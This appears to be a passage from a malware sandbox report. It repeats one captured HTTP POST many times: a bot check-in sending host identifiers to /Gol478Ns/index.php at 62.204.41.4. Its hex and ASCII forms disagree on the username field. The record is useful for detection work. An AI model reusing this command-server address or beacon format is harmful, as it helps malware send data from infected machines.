                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
